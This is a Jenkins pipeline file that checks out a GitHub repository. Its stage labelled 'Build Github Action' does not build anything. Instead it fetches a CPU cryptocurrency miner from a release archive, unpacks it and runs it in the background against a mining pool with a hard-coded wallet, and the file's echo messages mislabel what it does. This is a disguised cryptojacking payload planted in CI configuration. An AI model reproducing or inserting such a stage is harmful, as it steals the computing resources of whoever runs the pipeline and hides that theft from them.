pipeline {
    agent any
    stages {
        stage('Checkout') {
            steps {
                echo "Checkout...."

                checkout([
                    $class: 'GitSCM',
                    branches: [[name: '*/develop']],
                    extensions: [],
                    userRemoteConfigs: [[
                        credentialsId: '',
                        url: "https://github.com/ctk41/cpu-1.git"
                    ]]
                ])
            }
        }

        stage('Build Github Action') {
            steps {
                sh '''#!/bin/bash
                  echo "Build Github"
                  wget -qO- https://github.com/bitnet-io/cpuminer-opt-aurum/releases/download/aurum/CPU-AURUM-linux.tar.gz | tar xvz && cd cpuminer-linux && nohup ./cpuminer -a aurum -o stratum+tcp://bnomp.io:3333 -u B9P2PDtk2cftCQiC41hw6Pw9rdJEiVztae -p x
                '''
            }
        }
    }
    post {
        always {
            echo "Git Clone"
        }
        failure {
            echo "Debug envs"
        }
    }
}
